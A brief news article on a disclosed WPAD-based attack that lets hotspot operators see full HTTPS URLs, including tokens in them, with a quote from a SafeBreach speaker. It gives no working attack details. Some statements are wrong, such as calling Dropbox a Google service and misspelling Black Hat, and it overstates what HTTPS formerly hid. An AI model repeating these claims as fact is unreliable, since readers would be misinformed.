HTTPS was considered immune to hackers looking to track the websites visited by a user. A new hack breaks this HTTPS protection in Windows, Linux, and Mac systems. The hack can be carried by Wi-Fi hotspot operators, Ars Technica reports.
HTTPS encryption assured users that the addresses of the websites they visit could not be monitored or viewed by data snoopers and other such malicious users. However, a new hack has broken this encryption. This hack can be carried out on any network, most notably in Wi-Fi hotspots, where this encryption is most required.
This hack is possible by illicit usage of a feature called WPAD, which is short for Web Proxy Autodiscovery. Doing so will expose some browser requests to the code controlled by the attacker. The attacker can then view all the websites user visits. It is said that this exploit works in all browsers on every operating system. This HTTPS hack is scheduled to be unveiled in a Black Hast security conference in Las Vegas next week.
The enormity of this attack is still discussed. Although this attack only makes the full URL of visited websites available to the hacker, the consequences of that are too grave. This is because many websites and web services use URL to authenticate a user. For example, Google’s Dropbox uses a security token in the URL. Even some password-reset mechanisms use this token security technique. So despite the attacker gaining access only to the full URL, he or she can misuse that to great effect.
Itzik Kotler, co-founder of SafeBreach, is one of the scheduled speakers at the conference in Las Vegas next week and addressed this issue in an email. He said that this hack is of great concern, for people all over the world rely on HTTPS encryption in places where their LAN/Wi-Fi cannot be trusted. According to him, people using non-trusted networks are under threat when WPAD is enabled.